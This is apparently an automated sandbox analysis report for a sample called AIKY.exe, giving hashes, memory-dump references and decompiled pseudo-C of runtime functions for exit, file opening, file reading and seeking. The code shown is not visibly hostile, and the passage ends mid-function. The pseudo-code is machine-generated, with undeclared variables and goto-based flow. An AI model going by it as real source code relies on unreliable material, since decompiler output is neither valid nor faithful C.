Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$System$File
String ID: F8A/
API String ID: 2838179519-73971870
Opcode ID: 26fe95719e42169129d2f5d60afce76efdd61e05128723098fff7477d75a12fa
Instruction ID: 22eee7a5370ec17acc4ca31cffce6692f1ea9b48890815414cb740698df28001
Opcode Fuzzy Hash: 26fe95719e42169129d2f5d60afce76efdd61e05128723098fff7477d75a12fa
Instruction Fuzzy Hash: FFF01271E001099BDF08EBB5DD96BBEB7BCAB0D304F440529A106F6191EA38E6048751

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: AIKY.exe PID: 5592 Parent PID: 1104 AIKY.exeCOMMON

Executed Functions

Function 00B52E1C, Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B52E1C(int _a4) {
				void* _t14;

				if(E00B59643(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00B52E5E(_t14, _a4);
				ExitProcess(_a4);
			}

0x00b52e29
0x00b52e45
0x00b52e45
0x00b52e4e
0x00b52e57

APIs

GetCurrentProcess.KERNEL32(?,?,00B52E1B,00000001,00000000,?,00000001,?,00B58F84), ref: 00B52E3E
TerminateProcess.KERNEL32(00000000,?,00B52E1B,00000001,00000000,?,00000001,?,00B58F84), ref: 00B52E45
ExitProcess.KERNEL32 ref: 00B52E57

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 80fddf3854e95d028ca3e79cf7e4a8d23e78625ed6adc2bc930c777ac134c4e2
Instruction ID: 16744d49e27680b0c360ff3eb38a75a49ef4701e8ce751448427932d655e4dcb
Opcode Fuzzy Hash: 80fddf3854e95d028ca3e79cf7e4a8d23e78625ed6adc2bc930c777ac134c4e2
Instruction Fuzzy Hash: 95E04631041108AFCF223F54CE4AA493BA9EB42342B0004D4FD0997131CF7AED9ACA80

Uniqueness

Uniqueness Score: -1.00%

Function 00B61E73, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 274
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00B61E73(void* __ecx, void* __eflags, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				void* _t122;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t162;
				intOrPtr _t178;
				void* _t188;
				signed int* _t189;
				signed int _t191;
				char _t196;
				signed int _t202;
				signed int _t205;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t224;
				signed int _t226;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				signed int _t238;
				signed char _t241;
				signed int _t242;
				intOrPtr _t246;
				void* _t253;
				void* _t263;
				signed int _t264;
				signed int _t267;
				signed int _t268;
				signed int _t271;
				void* _t273;
				void* _t275;
				void* _t276;
				void* _t278;
				void* _t279;
				void* _t281;
				void* _t285;

				_t263 = E00B61BBB(__ecx,  &_v72, _a16, _a20, _a24);
				_t191 = 6;
				memcpy( &_v48, _t263, _t191 << 2);
				_t275 = _t273 + 0x1c;
				_t264 = _t263 | 0xffffffff;
				if(_v36 != _t264) {
					_t114 = E00B5B06B(_t188, __eflags);
					_t189 = _a8;
					 *_t189 = _t114;
					__eflags = _t114 - _t264;
					if(_t114 != _t264) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t276 = _t275 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t276,  &_v48, 1 << 2);
						_t196 = 0;
						_t122 = E00B61B26(); // executed
						_t253 = _t122;
						_t278 = _t276 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t253); // executed
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E00B5AFB4(_t196,  *_t189, _t253);
								_t241 = _v5 | 0x00000001;
								_v5 = _t241;
								_v48 = _t241;
								 *( *((intOrPtr*)(0xb6a6c8 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) = _t241;
								_t202 =  *_t189;
								_t204 = (_t202 & 0x0000003f) * 0x38;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0xb6a6c8 + (_t202 >> 6) * 4)) + 0x29 + (_t202 & 0x0000003f) * 0x38)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L22:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t279 = _t278 - 0x18;
									_t205 = 6;
									_push( *_t189);
									memcpy(_t279,  &_v48, _t205 << 2);
									_t134 = E00B618D1(_t189,  &_v48 + _t205 + _t205,  &_v48);
									_t242 =  *_t189;
									_t267 = _t134;
									_t281 = _t279 + 0x30;
									__eflags = _t267;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0xb6a6c8 + (_t242 >> 6) * 4)) + 0x29 + (_t242 & 0x0000003f) * 0x38)) = _v6;
										 *( *((intOrPtr*)(0xb6a6c8 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0xb6a6c8 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0xb6a6c8 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t224 =  *_t189;
												_t226 = (_t224 & 0x0000003f) * 0x38;
												_t162 =  *((intOrPtr*)(0xb6a6c8 + (_t224 >> 6) * 4));
												_t87 = _t162 + _t226 + 0x28;
												 *_t87 =  *(_t162 + _t226 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t268 = _v44;
										__eflags = (_t268 & 0xc0000000) - 0xc0000000;
										if((_t268 & 0xc0000000) != 0xc0000000) {
											L32:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L32;
											}
											CloseHandle(_v12);
											_v44 = _t268 & 0x7fffffff;
											_t214 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t281 - 0x18,  &_v48, _t214 << 2);
											_t246 = E00B61B26();
											__eflags = _t246 - 0xffffffff;
											if(_t246 != 0xffffffff) {
												_t216 =  *_t189;
												_t218 = (_t216 & 0x0000003f) * 0x38;
												__eflags = _t218;
												 *((intOrPtr*)( *((intOrPtr*)(0xb6a6c8 + (_t216 >> 6) * 4)) + _t218 + 0x18)) = _t246;
												goto L32;
											}
											E00B55B87(GetLastError());
											 *( *((intOrPtr*)(0xb6a6c8 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0xb6a6c8 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
											E00B5B174( *_t189);
											L10:
											goto L2;
										}
									}
									_push(_t242);
									goto L21;
								} else {
									_t267 = E00B61D37(_t204,  *_t189);
									__eflags = _t267;
									if(__eflags == 0) {
										goto L22;
									}
									_push( *_t189);
									L21:
									E00B58BA1(__eflags);
									return _t267;
								}
							}
							_t271 = GetLastError();
							E00B55B87(_t271);
							 *( *((intOrPtr*)(0xb6a6c8 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0xb6a6c8 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
							CloseHandle(_t253);
							__eflags = _t271;
							if(_t271 == 0) {
								 *((intOrPtr*)(E00B55BBD())) = 0xd;
							}
							goto L2;
						}
						_t233 = _v44;
						__eflags = (_t233 & 0xc0000000) - 0xc0000000;
						if((_t233 & 0xc0000000) != 0xc0000000) {
							L9:
							_t234 =  *_t189;
							_t236 = (_t234 & 0x0000003f) * 0x38;
							_t178 =  *((intOrPtr*)(0xb6a6c8 + (_t234 >> 6) * 4));
							_t33 = _t178 + _t236 + 0x28;
							 *_t33 =  *(_t178 + _t236 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E00B55B87(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t285 = _t278 - 0x18;
						_v44 = _t233 & 0x7fffffff;
						_t238 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t285,  &_v48, _t238 << 2);
						_t196 = 0;
						_t253 = E00B61B26();
						_t278 = _t285 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E00B55BAA()) =  *_t184 & 0x00000000;
						 *_t189 = _t264;
						 *((intOrPtr*)(E00B55BBD())) = 0x18;
						goto L2;
					}
				} else {
					 *(E00B55BAA()) =  *_t186 & 0x00000000;
					 *_a8 = _t264;
					L2:
					return  *((intOrPtr*)(E00B55BBD()));
				}
			}

0x00b61e96
0x00b61e9a
0x00b61e9b
0x00b61e9b
0x00b61e9d
0x00b61ea3
0x00b61ebe
0x00b61ec3
0x00b61ec6
0x00b61ec8
0x00b61eca
0x00b61ee9
0x00b61ef0
0x00b61ef7
0x00b61efa
0x00b61f06
0x00b61f09
0x00b61f11
0x00b61f12
0x00b61f15
0x00b61f15
0x00b61f17
0x00b61f1c
0x00b61f1e
0x00b61f21
0x00b61f29
0x00b61f2c
0x00b61f99
0x00b61f9a
0x00b61fa0
0x00b61fa2
0x00b61feb
0x00b61fee
0x00b61ff7
0x00b61ffa
0x00b61ffd
0x00b61fff
0x00b61fff
0x00b61fff
0x00b61ff0
0x00b61ff3
0x00b61ff3
0x00b62004
0x00b62007
0x00b62013
0x00b62018
0x00b62024
0x00b6202e
0x00b62032
0x00b6203c
0x00b6203f
0x00b6204a
0x00b6204f
0x00b6206e
0x00b62071
0x00b62075
0x00b62076
0x00b6207c
0x00b62081
0x00b62084
0x00b62086
0x00b62088
0x00b6208d
0x00b6208f
0x00b62091
0x00b62094
0x00b62096
0x00b620b0
0x00b620d4
0x00b620d8
0x00b620dc
0x00b620de
0x00b620e2
0x00b620e4
0x00b620ee
0x00b620f1
0x00b620f8
0x00b620f8
0x00b620f8
0x00b620f8
0x00b620e2
0x00b620fd
0x00b62109
0x00b6210b
0x00b62196
0x00b62196
0x00000000
0x00b62111
0x00b62111
0x00b62115
0x00000000
0x00000000
0x00b6211a
0x00b6212c
0x00b62134
0x00b62137
0x00b62138
0x00b6213b
0x00b62142
0x00b62147
0x00b6214a
0x00b6217e
0x00b62188
0x00b62188
0x00b62192
0x00000000
0x00b62192
0x00b62153
0x00b6216c
0x00b62173
0x00b61f93
0x00000000
0x00b61f93
0x00b6210b
0x00b62098
0x00000000
0x00b62051
0x00b62058
0x00b6205b
0x00b6205d
0x00000000
0x00000000
0x00b6205f
0x00b62061
0x00b62061
0x00000000
0x00b62067
0x00b6204f
0x00b61faa
0x00b61fad
0x00b61fc8
0x00b61fcd
0x00b61fd3
0x00b61fd5
0x00b61fe0
0x00b61fe0
0x00000000
0x00b61fd5
0x00b61f2e
0x00b61f35
0x00b61f37
0x00b61f6e
0x00b61f6e
0x00b61f78
0x00b61f7b
0x00b61f82
0x00b61f82
0x00b61f82
0x00b61f8e
0x00000000
0x00b61f8e
0x00b61f39
0x00b61f3d
0x00000000
0x00000000
0x00b61f3f
0x00b61f4e
0x00b61f53
0x00b61f56
0x00b61f57
0x00b61f5a
0x00b61f5a
0x00b61f61
0x00b61f63
0x00b61f66
0x00b61f69
0x00b61f6c
0x00000000
0x00000000
0x00000000
0x00b61ecc
0x00b61ed1
0x00b61ed4
0x00b61edb
0x00000000
0x00b61edb
0x00b61ea5
0x00b61eaa
0x00b61eb0
0x00b61eb2
0x00000000
0x00b61eb7

APIs

Part of subcall function 00B61B26: CreateFileW.KERNELBASE(00000000,00000000,?,00B61F1C,?,?,00000000,?,00B61F1C,00000000,0000000C), ref: 00B61B43

GetLastError.KERNEL32 ref: 00B61F87
__dosmaperr.LIBCMT ref: 00B61F8E
GetFileType.KERNELBASE(00000000), ref: 00B61F9A
GetLastError.KERNEL32 ref: 00B61FA4
__dosmaperr.LIBCMT ref: 00B61FAD
CloseHandle.KERNEL32(00000000), ref: 00B61FCD
CloseHandle.KERNEL32(00B5892B), ref: 00B6211A
GetLastError.KERNEL32 ref: 00B6214C
__dosmaperr.LIBCMT ref: 00B62153

Strings

H, xrefs: 00B620D8

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 98fa90234541cb55081df3580254d39ec999e7adfcabe246a328957eb958c973
Instruction ID: c5956d696b5896422852ae79306637db79c955fd15a45aa975bf40feba647256
Opcode Fuzzy Hash: 98fa90234541cb55081df3580254d39ec999e7adfcabe246a328957eb958c973
Instruction Fuzzy Hash: FFA13532A045448FDF29DF68DC92BAD3BE0EB06325F1801D9EC11AB2E1DB798C06CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00B57A53, Relevance: 13.8, APIs: 9, Instructions: 302
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00B57A53(signed int _a4, void* _a8, unsigned int _a12) {
				char _v5;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				long _v32;
				char _v36;
				void* _v40;
				long _v44;
				signed int* _t137;
				signed int _t139;
				intOrPtr _t143;
				signed char _t148;
				unsigned int _t154;
				intOrPtr _t158;
				signed int _t160;
				signed int _t163;
				long _t164;
				intOrPtr _t169;
				signed int _t170;
				intOrPtr _t172;
				signed int _t174;
				signed int _t178;
				void _t180;
				char _t185;
				char _t190;
				signed char _t196;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t207;
				long _t210;
				unsigned int _t212;
				intOrPtr _t214;
				unsigned int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed char _t224;
				char _t226;
				signed int _t228;
				void* _t229;
				signed int _t230;
				char* _t231;
				char* _t232;
				signed int _t235;
				signed int _t236;
				void* _t240;
				void* _t242;
				void* _t243;

				_t198 = _a4;
				if(_t198 != 0xfffffffe) {
					__eflags = _t198;
					if(_t198 < 0) {
						L59:
						_t137 = E00B55BAA();
						 *_t137 =  *_t137 & 0x00000000;
						__eflags =  *_t137;
						 *((intOrPtr*)(E00B55BBD())) = 9;
						L60:
						_t139 = E00B528EC();
						goto L61;
					}
					__eflags = _t198 -  *0xb6a8c8; // 0x40
					if(__eflags >= 0) {
						goto L59;
					}
					_t207 = _t198 >> 6;
					_t235 = (_t198 & 0x0000003f) * 0x38;
					_v12 = _t207;
					_t143 =  *((intOrPtr*)(0xb6a6c8 + _t207 * 4));
					_v20 = _t235;
					_v36 = 1;
					_t224 =  *((intOrPtr*)(_t143 + _t235 + 0x28));
					__eflags = 1 & _t224;
					if((1 & _t224) == 0) {
						goto L59;
					}
					_t210 = _a12;
					__eflags = _t210 - 0x7fffffff;
					if(_t210 <= 0x7fffffff) {
						__eflags = _t210;
						if(_t210 == 0) {
							L58:
							return 0;
						}
						__eflags = _t224 & 0x00000002;
						if((_t224 & 0x00000002) != 0) {
							goto L58;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_v28 =  *((intOrPtr*)(_t143 + _t235 + 0x18));
						_t226 =  *((intOrPtr*)(_t143 + _t235 + 0x29));
						_v5 = _t226;
						_t240 = 0;
						_t228 = _t226 - 1;
						__eflags = _t228;
						if(_t228 == 0) {
							_t148 =  !_t210;
							__eflags = _t148 & 0x00000001;
							if((_t148 & 0x00000001) == 0) {
								L14:
								 *(E00B55BAA()) =  *_t149 & _t240;
								 *((intOrPtr*)(E00B55BBD())) = 0x16;
								E00B528EC();
								goto L39;
							} else {
								_t154 = 4;
								_t212 = _t210 >> 1;
								_v16 = _t154;
								__eflags = _t212 - _t154;
								if(_t212 >= _t154) {
									_t154 = _t212;
									_v16 = _t212;
								}
								_t240 = E00B56F1C(_t154);
								E00B564B8(0);
								E00B564B8(0);
								_t243 = _t242 + 0xc;
								_v24 = _t240;
								__eflags = _t240;
								if(_t240 != 0) {
									_t158 = E00B572D3(_t198, 0, 0, 1);
									_t242 = _t243 + 0x10;
									_t214 =  *((intOrPtr*)(0xb6a6c8 + _v12 * 4));
									 *((intOrPtr*)(_t235 + _t214 + 0x20)) = _t158;
									 *(_t235 + _t214 + 0x24) = _t228;
									_t229 = _t240;
									_t210 = _v16;
									_t143 =  *((intOrPtr*)(0xb6a6c8 + _v12 * 4));
									L22:
									_t199 = _v20;
									_t235 = 0;
									_v40 = _t229;
									__eflags =  *(_t199 + _t143 + 0x28) & 0x00000048;
									_t200 = _a4;
									if(( *(_t199 + _t143 + 0x28) & 0x00000048) != 0) {
										_t180 =  *((intOrPtr*)(_v20 + _t143 + 0x2a));
										_t200 = _a4;
										__eflags = _t180 - 0xa;
										if(_t180 != 0xa) {
											__eflags = _t210;
											if(_t210 != 0) {
												_t235 = 1;
												 *_t229 = _t180;
												_t231 = _t229 + 1;
												_t220 = _t210 - 1;
												__eflags = _v5;
												_v24 = _t231;
												_v16 = _t220;
												 *((char*)(_v20 +  *((intOrPtr*)(0xb6a6c8 + _v12 * 4)) + 0x2a)) = 0xa;
												_t200 = _a4;
												if(_v5 != 0) {
													_t185 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0xb6a6c8 + _v12 * 4)) + 0x2b));
													_t200 = _a4;
													__eflags = _t185 - 0xa;
													if(_t185 != 0xa) {
														__eflags = _t220;
														if(_t220 != 0) {
															 *_t231 = _t185;
															_t232 = _t231 + 1;
															_t221 = _t220 - 1;
															__eflags = _v5 - 1;
															_v24 = _t232;
															_t235 = 2;
															_v16 = _t221;
															 *((char*)(_v20 +  *((intOrPtr*)(0xb6a6c8 + _v12 * 4)) + 0x2b)) = 0xa;
															_t200 = _a4;
															if(_v5 == 1) {
																_t190 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0xb6a6c8 + _v12 * 4)) + 0x2c));
																_t200 = _a4;
																__eflags = _t190 - 0xa;
																if(_t190 != 0xa) {
																	__eflags = _t221;
																	if(_t221 != 0) {
																		 *_t232 = _t190;
																		_t222 = _t221 - 1;
																		__eflags = _t222;
																		_v16 = _t222;
																		_v24 = _t232 + 1;
																		_t235 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0xb6a6c8 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t160 = E00B614F2(_t200);
									__eflags = _t160;
									if(_t160 == 0) {
										L42:
										_v36 = 0;
										L43:
										_t163 = ReadFile(_v28, _v24, _v16,  &_v32, 0); // executed
										__eflags = _t163;
										if(_t163 == 0) {
											L54:
											_t164 = GetLastError();
											_t235 = 5;
											__eflags = _t164 - _t235;
											if(_t164 != _t235) {
												__eflags = _t164 - 0x6d;
												if(_t164 != 0x6d) {
													L38:
													E00B55B87(_t164);
													goto L39;
												}
												_t236 = 0;
												goto L40;
											}
											 *((intOrPtr*)(E00B55BBD())) = 9;
											 *(E00B55BAA()) = _t235;
											goto L39;
										}
										_t217 = _a12;
										__eflags = _v32 - _t217;
										if(_v32 > _t217) {
											goto L54;
										}
										_t236 = _t235 + _v32;
										__eflags = _t236;
										L46:
										_t230 = _v20;
										_t169 =  *((intOrPtr*)(0xb6a6c8 + _v12 * 4));
										__eflags =  *((char*)(_t230 + _t169 + 0x28));
										if( *((char*)(_t230 + _t169 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v36;
												_push(_t236 >> 1);
												_push(_v40);
												_push(_t200);
												if(_v36 == 0) {
													_t170 = E00B575AE();
												} else {
													_t170 = E00B578CE();
												}
											} else {
												_t218 = _t217 >> 1;
												__eflags = _t217 >> 1;
												_t170 = E00B57775(_t217 >> 1, _t217 >> 1, _t200, _v24, _t236, _a8, _t218);
											}
											_t236 = _t170;
										}
										goto L40;
									}
									_t219 = _v20;
									_t172 =  *((intOrPtr*)(0xb6a6c8 + _v12 * 4));
									__eflags =  *((char*)(_t219 + _t172 + 0x28));
									if( *((char*)(_t219 + _t172 + 0x28)) >= 0) {
										goto L42;
									}
									_t174 = GetConsoleMode(_v28,  &_v44);
									__eflags = _t174;
									if(_t174 == 0) {
										goto L42;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L43;
									}
									_t178 = ReadConsoleW(_v28, _v24, _v16 >> 1,  &_v32, 0);
									__eflags = _t178;
									if(_t178 != 0) {
										_t217 = _a12;
										_t236 = _t235 + _v32 * 2;
										goto L46;
									}
									_t164 = GetLastError();
									goto L38;
								} else {
									 *((intOrPtr*)(E00B55BBD())) = 0xc;
									 *(E00B55BAA()) = 8;
									L39:
									_t236 = _t235 | 0xffffffff;
									__eflags = _t236;
									L40:
									E00B564B8(_t240);
									return _t236;
								}
							}
						}
						__eflags = _t228 == 1;
						if(_t228 == 1) {
							_t196 =  !_t210;
							__eflags = _t196 & 0x00000001;
							if((_t196 & 0x00000001) != 0) {
								_t229 = _a8;
								_v16 = _t210;
								_v24 = _t229;
								_t143 =  *((intOrPtr*)(0xb6a6c8 + _v12 * 4));
								goto L22;
							}
							goto L14;
						} else {
							_t229 = _a8;
							_v16 = _t210;
							_v24 = _t229;
							goto L22;
						}
					}
					L6:
					 *(E00B55BAA()) =  *_t145 & 0x00000000;
					 *((intOrPtr*)(E00B55BBD())) = 0x16;
					goto L60;
				} else {
					 *(E00B55BAA()) =  *_t197 & 0x00000000;
					_t139 = E00B55BBD();
					 *_t139 = 9;
					L61:
					return _t139 | 0xffffffff;
				}
			}

0x00b57a5c
0x00b57a63
0x00b57a7d
0x00b57a7f
0x00b57de4
0x00b57de4
0x00b57de9
0x00b57de9
0x00b57df1
0x00b57df7
0x00b57df7
0x00000000
0x00b57df7
0x00b57a85
0x00b57a8b
0x00000000
0x00000000
0x00b57a95
0x00b57a9b
0x00b57a9e
0x00b57aa1
0x00b57aab
0x00b57aae
0x00b57ab1
0x00b57ab5
0x00b57ab7
0x00000000
0x00000000
0x00b57abd
0x00b57ac0
0x00b57ac6
0x00b57ae0
0x00b57ae2
0x00b57de0
0x00000000
0x00b57de0
0x00b57ae8
0x00b57aeb
0x00000000
0x00000000
0x00b57af1
0x00b57af5
0x00000000
0x00000000
0x00b57afb
0x00b57afe
0x00b57b02
0x00b57b09
0x00b57b0b
0x00b57b0b
0x00b57b0e
0x00b57b61
0x00b57b63
0x00b57b65
0x00b57b2b
0x00b57b30
0x00b57b37
0x00b57b3d
0x00000000
0x00b57b67
0x00b57b69
0x00b57b6a
0x00b57b6c
0x00b57b6f
0x00b57b71
0x00b57b73
0x00b57b75
0x00b57b75
0x00b57b80
0x00b57b82
0x00b57b89
0x00b57b8e
0x00b57b91
0x00b57b94
0x00b57b96
0x00b57bba
0x00b57bc2
0x00b57bc5
0x00b57bcc
0x00b57bd3
0x00b57bd7
0x00b57bd9
0x00b57bdc
0x00b57be3
0x00b57be3
0x00b57be6
0x00b57be8
0x00b57beb
0x00b57bf0
0x00b57bf3
0x00b57bfc
0x00b57c00
0x00b57c03
0x00b57c05
0x00b57c0b
0x00b57c0d
0x00b57c16
0x00b57c17
0x00b57c19
0x00b57c1d
0x00b57c1e
0x00b57c22
0x00b57c25
0x00b57c2f
0x00b57c34
0x00b57c37
0x00b57c46
0x00b57c4a
0x00b57c4d
0x00b57c4f
0x00b57c51
0x00b57c53
0x00b57c58
0x00b57c5a
0x00b57c5e
0x00b57c5f
0x00b57c65
0x00b57c6f
0x00b57c70
0x00b57c73
0x00b57c78
0x00b57c7b
0x00b57c8a
0x00b57c8e
0x00b57c91
0x00b57c93
0x00b57c95
0x00b57c97
0x00b57c99
0x00b57c9f
0x00b57c9f
0x00b57ca0
0x00b57caf
0x00b57cb2
0x00b57cb3
0x00b57cb3
0x00b57c97
0x00b57c93
0x00b57c7b
0x00b57c53
0x00b57c4f
0x00b57c37
0x00b57c0d
0x00b57c05
0x00b57cb9
0x00b57cbf
0x00b57cc1
0x00b57d34
0x00b57d34
0x00b57d38
0x00b57d48
0x00b57d4e
0x00b57d50
0x00b57dac
0x00b57dac
0x00b57db4
0x00b57db5
0x00b57db7
0x00b57dd0
0x00b57dd3
0x00b57d10
0x00b57d11
0x00000000
0x00b57d16
0x00b57dd9
0x00000000
0x00b57dd9
0x00b57dbe
0x00b57dc9
0x00000000
0x00b57dc9
0x00b57d52
0x00b57d55
0x00b57d58
0x00000000
0x00000000
0x00b57d5a
0x00b57d5a
0x00b57d5d
0x00b57d60
0x00b57d63
0x00b57d6a
0x00b57d6f
0x00b57d71
0x00b57d75
0x00b57d90
0x00b57d94
0x00b57d95
0x00b57d98
0x00b57d99
0x00b57da5
0x00b57d9b
0x00b57d9b
0x00b57d9b
0x00b57d77
0x00b57d77
0x00b57d77
0x00b57d82
0x00b57d87
0x00b57d8a
0x00b57d8a
0x00000000
0x00b57d6f
0x00b57cc6
0x00b57cc9
0x00b57cd0
0x00b57cd5
0x00000000
0x00000000
0x00b57cde
0x00b57ce4
0x00b57ce6
0x00000000
0x00000000
0x00b57ce8
0x00b57cec
0x00000000
0x00000000
0x00b57d00
0x00b57d06
0x00b57d08
0x00b57d2c
0x00b57d2f
0x00000000
0x00b57d2f
0x00b57d0a
0x00000000
0x00b57b98
0x00b57b9d
0x00b57ba8
0x00b57d17
0x00b57d17
0x00b57d17
0x00b57d1a
0x00b57d1b
0x00000000
0x00b57d23
0x00b57b96
0x00b57b65
0x00b57b10
0x00b57b13
0x00b57b25
0x00b57b27
0x00b57b29
0x00b57b4a
0x00b57b4d
0x00b57b50
0x00b57b53
0x00000000
0x00b57b53
0x00000000
0x00b57b15
0x00b57b15
0x00b57b18
0x00b57b1b
0x00000000
0x00b57b1b
0x00b57b13
0x00b57ac8
0x00b57acd
0x00b57ad5
0x00000000
0x00b57a65
0x00b57a6a
0x00b57a6d
0x00b57a72
0x00b57dfc
0x00000000
0x00b57dfc

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06ec4c85ff19279dfbe625b4475b13cd2a1e71a9f4b1d87d97321265db1a3f49
Instruction ID: fdb51c7f1fccf8dbfef3f838d011cc99422b6657446c7817168d18a25a10b921
Opcode Fuzzy Hash: 06ec4c85ff19279dfbe625b4475b13cd2a1e71a9f4b1d87d97321265db1a3f49
Instruction Fuzzy Hash: DCC1B1B0A482459FDB11DF98E880BBDBBF0EF49312F1441D9ED05A7391CB749949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B57229, Relevance: 7.6, APIs: 5, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00B57229(union _LARGE_INTEGER* __edx, void* _a4, union _LARGE_INTEGER _a8, intOrPtr _a12) {
				long _v8;
				void* _v12;
				union _LARGE_INTEGER* _v16;
				void* _v20;
				int _t17;
				signed int _t19;
				void* _t21;
				union _LARGE_INTEGER* _t25;

				_t25 = __edx;
				_push(1);
				if(SetFilePointerEx(_a4, 0, 0,  &_v20) == 0) {
					L1:
					_t19 = E00B55B87(GetLastError());
					L7:
					return _t19 | 0xffffffff;
				}
				_push(_a12);
				asm("cdq");
				_v12 = 0;
				_v8 = 0;
